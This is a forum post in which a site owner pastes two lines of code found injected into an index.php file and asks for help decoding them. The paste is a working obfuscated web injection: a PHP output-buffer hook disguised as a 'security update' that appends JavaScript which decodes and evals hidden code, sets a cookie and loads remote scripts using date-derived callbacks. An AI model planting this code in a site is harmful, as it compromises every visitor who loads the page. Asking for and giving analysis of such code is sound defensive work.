I have note these two long lines on the very top of the index.php file while upgrading some web pages.
I think somebody have gain access in some way overwriting the file and adding this code that i can't well understand what is doing. Any help on discover what it is the scope of this php + javascript?
Code:
<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ccZ3dZ225ngZ2574h;Z2569++Z2529Z257btmpZ253dds.sZ256cicZ2565Z2528Z2569,iZ252b1)Z253bsZ22;cdZ3dZ22Z2574Z253dsZ2574+StZ2572inZ2567.frZ256fZ256dZ2543haZ2572CodZ2565((Z2574Z256dp.Z22;caZ3dZ22Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)Z257bdsZ253duZ256eZ2565Z2573caZ2570Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564csZ2528cu,Z25314)Z2529;Z2522;Z22;czZ3dZ22Z2566Z2575nctZ2569onZ2520cz(Z2563zZ2529Z257bretZ2575rn Z2563aZ252bcbZ252bcc+Z2563Z2564Z252bZ2563e+cZ257a;};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectZ2569oZ256e dwZ2528t)Z257bcaZ253dZ2527Z252564oZ2525Z25363umZ2565Z25256etZ25252ewZ2572Z252569teZ252528Z2525Z25322Z2527;ceZ253dZ2527Z252522Z252529Z2527;Z2563bZ253dZ2527Z25253csZ252563rZ252569Z252570tZ2520Z25256caZ25256egZ2575Z25256Z2531Z252567eZ25253dZ25255cZ252522javZ2561sZ252563Z252572iZ252570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ252570Z2574Z25253eZ2527Z253bevaZ256c(Z2575Z256eescZ2561Z2570eZ2528Z2574))Z257d;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;ceZ3dZ22cZ2568Z2561rCZ256fdeAZ2574(0Z2529Z255e(Z25270x00Z2527+Z2565Z2573)))Z253b}Z257dZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bZ2564bZ252bZ2564cZ252bdZ2564+Z2564Z2565Z252c1Z2530Z2529Z253bZ2564wZ2528sZ2574Z2529;Z2573tZ253d$Z2561;Z2522Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;cbZ3dZ22e(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0Z253biZ253cZ2564s.lZ256Z22;Z69f (Z64oZ63umZ65Z6et.Z63ookZ69e.Z69ndeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fn cZ61Z6cZ6cbZ61ckZ28xZ29Z7bwiZ6edoZ77.twZ20Z3d Z78;vZ61Z72Z20dZ20Z3d nZ65wZ20DZ61Z74e()Z3bd.sZ65Z74TimZ65Z28x[Z22as_Z6ffZ22]*10Z300);Z76ar Z68Z20Z3d dZ2egetZ55TZ43HoZ75rZ73Z28);wZ69ndZ6fw.hZ20Z3dZ20Z68;iZ66 (hZ20Z3e 8)Z7bd.sZ65Z74Z55TZ43DaZ74Z65(dZ2egetZ55TCDZ61teZ28) -Z202)Z3b}elZ73eZ7bd.Z73etZ55TZ43Z44ateZ28Z64.Z67Z65tUZ54Z43Z44atZ65() Z2d Z33);}Z77Z69nZ64owZ2egdZ20Z3d Z64;vaZ72Z20Z74iZ6de Z3d nZ65w AZ72rayZ28);vZ61r sZ68iZ66Z74Z49Z6eZ64exZ20Z3d Z22Z22;time[Z22yearZ22] Z3d d.Z67Z65Z74UTZ43Z46ulZ6cYeZ61rZ28Z29;Z74imeZ5bZ22monZ74hZ22Z5dZ20Z3d d.Z67Z65Z74UZ54Z43MZ6fnthZ28Z29Z2b1Z3btZ69meZ5bZ22dayZ22] Z3d d.geZ74UTZ43Z44ateZ28);Z69Z66 (dZ2egZ65tUTZ43MZ6fZ6eth(Z29+1 Z3cZ2010)Z7bZ73hZ69fZ74IndZ65Z78 Z3d tZ69me[Z22yeaZ72Z22] + Z22-0Z22 +Z20(d.Z67etUZ54CMoZ6etZ68Z28)Z2b1)Z3b}Z65lseZ7bZ73hifZ74IndZ65x Z3d tiZ6dZ65[Z22yeZ61Z72Z22]Z20+ Z22-Z22 Z2bZ20(Z64.gZ65tZ55TZ43Z4dontZ68()Z2bZ31Z29Z3b}iZ66 (dZ2egeZ74Z55TCZ44Z61teZ28) Z3cZ20Z310Z29Z7bshZ69fZ74IZ6edeZ78 Z3dshZ69fZ74IndZ65x +Z20Z22-0Z22 +Z20Z64.Z67etUZ54CDaZ74Z65();Z7delsZ65Z7bshiftZ49ndeZ78Z20Z3d shifZ74IndZ65x +Z20Z22-Z22 + d.geZ74UTZ43DZ61teZ28Z29;}Z64Z6fcuZ6deZ6etZ2ewriZ74eZ28Z22Z3cscrZ22+Z22iZ70t Z6caZ6eZ67Z75aZ67eZ3djavZ61scrZ69ptZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearZ63Z68Z2etZ77Z69ttZ65rZ2eZ63Z6fZ6dZ2ftrZ65ndsZ2fdZ61ilyZ2eZ6asoZ6e?dZ61Z74eZ3dZ22+ sZ68Z69ftZ49Z6eZ64eZ78Z2bZ22&callbZ61ckZ3dcaZ6clbZ61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);} Z66unZ63tZ69on Z63aZ6clbZ61cZ6b2(xZ29Z7bwiZ6edoZ77.Z74Z77 Z3d x;scZ28Z27rf5Z666dsZ27,Z32,7Z29;evZ61l(Z75Z6eesZ63aZ70e(dZ7aZ2bcz+Z6fp+sZ74)+Z27dZ77(dZ7a+czZ28$Z61Z2bstZ29);Z27)Z3bdocZ75Z6dentZ2ewrZ69teZ28$aZ29Z3b}dZ6fcumZ65nZ74.wZ72Z69Z74Z65(Z22Z3cimZ67 sZ72cZ3dZ27httpZ3aZ2fZ2fsZ65aZ72cZ68.Z74wZ69ttZ65r.cZ6fmZ2fiZ6dagZ65sZ2fseaZ72chZ2frZ73Z73Z2eZ70Z6egZ27 wZ69dZ74hZ3d1 hZ65igZ68tZ3d1Z20Z73tylZ65Z3dZ27visibiliZ74Z79Z3ahZ69Z64Z64Z65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uZ61Z67eZ3djavZ61sZ63rZ69pZ74Z22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearchZ2etwiZ74teZ72Z2ecomZ2ftZ72eZ6eZ64sZ2fdZ61ilyZ2ejZ73on?Z63alZ6cbaZ63kZ3dcalZ6cbacZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delsZ65Z7b$aZ3dZ27Z27};funZ63tZ69Z6fn sZ63(cZ6em,vZ2ceZ64Z29Z7bvarZ20exZ64Z3dnewZ20Z44aZ74e()Z3bexdZ2esZ65tDaZ74e(Z65xZ64Z2egZ65tDaZ74eZ28)+eZ64Z29;Z64ocZ75meZ6etZ2ecooZ6biZ65Z3dcnmZ2bZ20Z27Z3dZ27 +eZ73capZ65(v)Z2bZ27;eZ78Z70ireZ73Z3dZ27+exZ64.toZ47MTZ53trZ69Z6egZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>';}//important security update ?>
analyzing a little piece i can understand for example, a very simple thing like:
Code:
httpZ3aZ2fZ2fsZ65aZ72cZ68.
i can determine that:
z3a is : (two points)
and Z2f is / (slash)
but it is easy, much more investigation is necessary to understand and i have not check/don't know if this is an octal (it isn't but for example) or something else converted string, maybe someone like a js guru can let understand in a short and easy way this javascript code inside a php function that grab the buffer. Thank you, anybody